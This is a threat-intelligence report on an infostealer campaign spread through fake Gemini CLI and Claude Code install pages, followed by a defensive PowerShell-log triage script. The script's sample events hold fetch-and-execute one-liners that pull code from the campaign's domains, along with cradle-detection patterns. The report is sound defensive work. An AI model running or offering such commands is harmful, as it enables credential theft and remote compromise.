CyberHappenings

Infostealer campaign abuses fake Google Gemini and Anthropic Claude Code sites in SEO poisoning attacks

1 source, 1 article

Summary


A threat actor ran an SEO poisoning campaign in early 2026, registering domains between March and April 2026 that impersonate Google's Gemini CLI and Anthropic's Claude Code in order to distribute an in-memory infostealer to Windows developers and enterprise users. Victims searching for the legitimate AI coding tools were steered by manipulated search results to malicious domains that mimic the official installation pages. Users who pasted the PowerShell commands shown on those pages unknowingly executed an infostealer that harvests browser credentials, session cookies, collaboration platform data, cryptocurrency wallet details, cloud storage files, and system metadata, and sends the stolen data to attacker-controlled command-and-control (C2) servers. The campaign shows a deliberate focus on developer workstations and enterprise environments, and its domain naming patterns (.co.uk, .us.com, .us.org) suggest geographic targeting of the US and UK.

Timeline

  1. 22.05.2026 14:30 · 1 article

    Infostealer campaign abuses fake Google Gemini CLI and Anthropic Claude Code sites through SEO poisoning

    Between March and April 2026, a threat actor registered malicious domains impersonating Google's Gemini CLI and Anthropic's Claude Code. Victims were lured via SEO poisoning to fake installation pages that instructed them to paste PowerShell commands into a terminal. Those commands fetched an infostealer from attacker-controlled domains and ran it in memory. The malware harvested credentials, session tokens, and application data from browsers, collaboration platforms, cryptocurrency wallets, cloud storage clients, and remote access tools, and exfiltrated the data to C2 servers at events[.]msft23[.]com and events[.]ms709[.]com. The consistent TTPs across the Gemini CLI and Claude Code impersonation chains suggest a single actor is behind both.


Information Snippets

  • Threat actors registered malicious domains such as geminicli[.]co[.]com, gemini-setup[.]com, claudecode[.]co[.]com, claude-setup[.]com, and C2 servers at events[.]msft23[.]com and events[.]ms709[.]com between March and April 2026.

    First reported: 22.05.2026 14:30
    1 source, 1 article
  • The infostealer is staged and executed entirely in memory by PowerShell, so no payload file is written to disk; the PowerShell invocation itself is still recorded wherever Script Block Logging (event ID 4104) or process command-line auditing is enabled. It targets Chromium-based and Firefox browsers, plus enterprise collaboration tools including Slack, Microsoft Teams, Discord, Mattermost, Zoom, Telegram Desktop, LiveChat, Notion, and Zoho Mail Desktop.

    First reported: 22.05.2026 14:30
    1 source, 1 article
  • Collected data includes session cookies, Chromium Local State encryption keys (which unlock the browser's stored cookies and passwords), DPAPI-protected credentials, wallet files, VPN configurations, and cloud storage access tokens. Replaying these lets the attacker reach internal communications and shared resources without re-authenticating.

    First reported: 22.05.2026 14:30
    1 source, 1 article
  • The malware also supports arbitrary remote code execution (RCE): it runs commands issued by the C2 server, allowing attackers to pivot from credential theft into an interactive intrusion on the infected host.

    First reported: 22.05.2026 14:30
    1 source, 1 article
  • The attack chains for the Gemini CLI and Claude Code impersonations are nearly identical: a pasted PowerShell command downloads the payload from an attacker-controlled domain, and the payload then reports to a distinct but similarly structured C2 server.

    First reported: 22.05.2026 14:30
    1 source, 1 article
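The pasted-PowerShell delivery chain and the C2 domains above give a defender two detection hooks: the generic fetch-and-execute cradle, and the specific infrastructure. The Python script below is an added example, not code from CyberHappenings or from the underlying report. It triages constructed PowerShell telemetry of the kind captured by Script Block Logging (event ID 4104) or process command-line auditing: it decodes -EncodedCommand arguments, extracts URL hosts, matches them against the domains listed on this page, and flags cradle verbs and window-hiding flags. The allowlist of approved install hosts is a placeholder assumption, the sample events are constructed, and the cradle and flag regexes are generic patterns rather than anything taken from the campaign.

```python
"""Triage PowerShell telemetry (Script Block Logging, event ID 4104, or process
command lines) for the paste-and-run cradle used in this campaign."""
import base64
import re

# Domains listed on this page, with the defanging brackets removed.
IOC_DOMAINS = {
    "geminicli.co.com", "gemini-setup.com",
    "claudecode.co.com", "claude-setup.com",
    "events.msft23.com", "events.ms709.com",
}

# Assumption: hosts your organisation approves as sources of install scripts.
# Placeholder values, not taken from the page.
ALLOWED_HOSTS = {"github.com", "raw.githubusercontent.com", "registry.npmjs.org"}

# Generic download-cradle verbs: fetch something, then execute it in memory.
CRADLE_RE = re.compile(
    r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest)\b"
    r"|downloadstring|downloaddata|downloadfile"
    r"|\[(?:system\.)?reflection\.assembly\]::load",
    re.I,
)
# Flags that hide the window or skip profile/policy; common in pasted one-liners.
EVASION_RE = re.compile(
    r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass",
    re.I,
)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def decode_encoded_commands(text):
    """Append the decoded payload of every -EncodedCommand (base64 of UTF-16LE)."""
    decoded = []
    for blob in ENCODED_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob).decode("utf-16-le"))
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
            continue
    return "\n".join([text, *decoded])


def hosts_in(text):
    return {h.lower().rstrip(".") for h in URL_HOST_RE.findall(text)}


def is_ioc(host):
    return host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS)


def analyze(script_text):
    """Classify one script block or command line."""
    text = decode_encoded_commands(script_text)
    hosts = hosts_in(text)
    ioc_hits = sorted(h for h in hosts if is_ioc(h))
    unlisted = sorted(h for h in hosts if h not in ALLOWED_HOSTS)
    cradle = CRADLE_RE.search(text) is not None
    if ioc_hits:
        verdict = "malicious"          # known campaign infrastructure
    elif cradle and unlisted:
        verdict = "suspicious"         # fetch-and-execute from an unapproved host
    elif cradle and hosts:
        verdict = "review"             # legitimate installers use this pattern too
    else:
        verdict = "benign"
    return {
        "verdict": verdict,
        "ioc_hits": ioc_hits,
        "cradle": cradle,
        "evasion": EVASION_RE.search(text) is not None,
        "hosts": sorted(hosts),
    }


def _encoded(cmd):
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real logs from the campaign).
SAMPLE_EVENTS = {
    "ev1": 'powershell -nop -w hidden -c "iex (New-Object Net.WebClient)'
           '.DownloadString(\'https://gemini-setup.com/install.ps1\')"',
    "ev2": "powershell -NoProfile -EncodedCommand "
           + _encoded("irm https://claude-setup.com/cc.ps1 | iex"),
    "ev3": r"Get-ChildItem C:\Users\dev\Projects | Sort-Object Length",
    "ev4": "irm https://raw.githubusercontent.com/example/tool/main/install.ps1 | iex",
    "ev5": "iwr https://gemini-cli-setup.example/install.ps1 -UseBasicParsing | iex",
}


def scan(events):
    """Return {event_id: verdict} for a mapping of event id to script text."""
    return {eid: analyze(text)["verdict"] for eid, text in events.items()}


if __name__ == "__main__":
    for eid, verdict in scan(SAMPLE_EVENTS).items():
        print(eid, verdict, analyze(SAMPLE_EVENTS[eid])["ioc_hits"])
```

Run it as a script to print a verdict per event. A cradle pointing at an approved host only gets "review" because legitimate installer one-liners use the same fetch-then-iex pattern, so matching the cradle alone produces false positives; the domain list is what turns a hit into "malicious", and it has to be kept current as the actor rotates infrastructure. Decoding -EncodedCommand matters because the host name never appears in the raw command line otherwise.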